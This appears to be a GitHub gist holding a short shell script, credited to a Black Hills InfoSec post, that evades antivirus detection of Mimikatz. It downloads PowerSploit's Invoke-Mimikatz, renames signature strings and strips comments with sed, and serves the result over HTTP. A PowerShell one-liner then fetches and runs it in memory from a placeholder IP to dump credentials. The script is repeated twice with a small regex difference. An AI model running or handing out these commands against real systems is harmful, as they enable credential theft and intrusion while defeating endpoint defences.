P3t3rp4rk3r/invoke_evasion.sh

## invoke_evasion.sh
# AV Bypass to run Mimikatz
# From: https://www.blackhillsinfosec.com/?p=5555

# Server side:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1
sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1
python -m SimpleHTTPServer 3615

# Client-side:
Invoke-Expression (New-Object Net.Webclient).downloadstring('http://x.x.x.x:3615/Invoke-Mimikatz.ps1')
Invoke-Mimidogz
	# AV Bypass to run Mimikatz
	# From: https://www.blackhillsinfosec.com/?p=5555

	# Server side:
	wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
	sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
	sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
	sed -i -e 's/^[[:space:]]#.$//g' Invoke-Mimikatz.ps1
	sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
	sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
	sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1
	sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1
	python -m SimpleHTTPServer 3615

	# Client-side:
	Invoke-Expression (New-Object Net.Webclient).downloadstring('http://x.x.x.x:3615/Invoke-Mimikatz.ps1')
	Invoke-Mimidogz